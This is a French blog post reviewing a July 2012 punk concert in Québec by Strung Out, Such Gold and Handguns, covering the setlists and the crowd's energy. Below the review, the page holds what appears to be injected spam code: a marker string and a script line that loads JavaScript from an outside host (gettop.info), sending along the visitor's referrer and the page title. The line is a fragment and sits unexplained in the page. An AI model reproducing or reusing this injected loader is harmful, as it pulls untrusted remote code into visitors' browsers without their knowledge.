Spectacle de Strung Out, Such Gold et Handguns, samedi 28 juillet 2012 au Cercle de Québec


Facebooktwitterredditpinterestlinkedinmail

Samedi passé, c'était le spectacle de Strung Out, Such Gold et Handguns au Cercle à Québec. Ma soirée s'est mal débutée, car je suis arrivée un peu en retard au spectacle, soit 9h35 environ et j'ai donc manqué la totalité du set de Handguns (le 2e band que j'avais plus envie de voir après Such Gold). Oui, Such Gold étant le premier et non Strung Out. Par contre, le set du groupe de Rochester, New-York, m'a énormément déçu, dû au fait qu'ils ont joués presque seulement des nouvelles chansons, alors que l'album n'est toujours pas sorti. La majorité des chansons m'était donc inconnue. C'est correct de jouer des nouvelles compositions, mais attend que le CD sorte avant de faire la promotion du disque avec un set presque entier de nouvelles chansons. J'ai quand même eu du plaisir pendant trois vieilles chansons, soit durant <

em>Gut Rot, Four Superbowls No Rings et Sycamore, ma chanson préférée qu'ils ont jouée en dernier. L'ambiance était plutôt relaxe pendant Such Gold, contrairement à celle de Strung Out qui était débile. En effet, les californiens de Strung Out ont enchaîné les chansons de deux vieux albums comme prévu pour leur tournée du nom de Twisted In A Suburban Wasteland Tour 2012. Ils ont commencé avec Suburban Teenage Wasteland Blues (1996) et ont terminé avec Twisted By Design (1998), incluant une pause de 5-10 minutes entre les deux. Durant la prestation, la foule chantait à tue-tête toutes les compositions classiques de ces deux albums en se garochant dans un slam constant, avec plusieurs stages dives par-ci, par-là. Bref, une ambiance exquise en énergie et une satisfaction semble avoir été rendue à tous ces fans présents. Un excellent show c'était.

zp8497586rq

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Ondes Chocs et Tim de Into Eternity
Next The Aggrolites, au Cercle vendredi 3 août